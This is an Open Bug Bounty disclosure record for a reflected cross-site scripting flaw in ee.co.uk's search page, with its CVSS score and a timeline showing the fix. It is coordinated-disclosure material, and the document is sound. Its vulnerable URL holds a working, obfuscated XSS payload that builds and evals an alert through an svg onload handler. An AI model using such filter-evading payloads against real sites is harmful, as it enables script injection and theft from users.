ee.co.uk XSS vulnerability

2018-02-21T13:54:00
ID OBB:565061
Type openbugbounty
Reporter olihough86
Modified 2018-03-31T11:27:00

Description

Open Bug Bounty ID: OBB-565061

Description| Value
---|---
Affected Website:| ee.co.uk
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Disclosure Standard:| Coordinated Disclosure based on ISO 29147 guidelines
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://ee.co.uk/search?q=%3Csvg%20onload%3D%22a%3D%27a%27%2B%27l%27%2B%27e%27%2B%27r%27%2B%27t%27%2B%27(%27%2B%27%26%2334%3B%26%2379%3B%26%2380%3B%26%2369%3B%26%2378%3B%26%2366%3B%26%2385%3B%26%2371%3B%26%2366%3B%26%2379%3B%26%2385%3B%26%2378%3B%26%2384%3B%26%2389%3B%26%2334%3B%27%2B%27)%27,eval(a)%22%3E
Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 21 February, 2018 13:54 GMT
Vulnerability Verified:| 21 February, 2018 14:01 GMT
Website Operator Notified:| 21 February, 2018 14:01 GMT
Vulnerability Published:| 21 February, 2018 14:01 GMT[without any technical details]
Vulnerability Fixed:| 31 March, 2018 11:27 GMT
Public Disclosure:| 31 March, 2018 11:27 GMT